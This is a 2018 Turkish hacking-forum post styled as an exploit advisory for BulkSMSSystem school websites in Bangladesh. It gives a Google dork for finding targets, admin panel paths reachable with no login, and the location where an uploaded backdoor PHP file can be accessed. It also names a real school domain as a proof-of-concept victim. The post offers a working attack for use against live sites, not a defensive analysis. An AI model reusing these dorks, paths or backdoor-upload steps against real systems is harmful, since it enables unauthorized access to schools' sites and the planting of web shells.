Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: BulkSMSSystem BD Education Improper Auth Backdoor Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 31 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6459
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
BulkSMSSystem BD Education Improper Auth Backdoor Vuln
04.09.2018 06:01
################################################################################​#################

# Exploit Title : BulkSMSSystem Bangladesh Education Improper Authentication Backdoor Account Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-287 - [ Improper Authentication ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-288 - [ Authentication Bypass Using an Alternate Path or Channel ]

################################################################################​#################

# Description for Improper Authentication Vulnerability [ CWE-287 ]

+ When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.

+ If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering
(e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges
within the application or disclose sensitive information.

+ If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page:

+ If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page.

+ The attacker might be able to gain unauthorized access to the application and otherwise
restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code.

+ An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks.

Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org]

################################################################################​#########

# Google Dork : inurl:/admin/myfile/ site:bd

# Exploit : /admin/myfile/index.php

No Username and Password Required.

# Useable Admin Control Panel Path URL Links =>

/admin/index.php
/admin/myfile/index.php
/admin/member.php
/admin/member2.php
/admin/headline.php

See your uploaded backdoor .php file here => /pdfview.php?id=[ID-NUMBER]

################################################################################​#################

# Example Site => pbmhhschandpur.edu.bd => [ Proof of Concept ] => archive.is/m9D3m

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 05.09.2018 Tarihinde, Saat: 01:24 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi